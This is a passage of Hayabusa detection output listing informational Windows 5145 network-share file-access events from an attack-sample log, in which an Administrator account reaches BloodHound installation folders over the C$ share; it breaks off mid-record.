10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 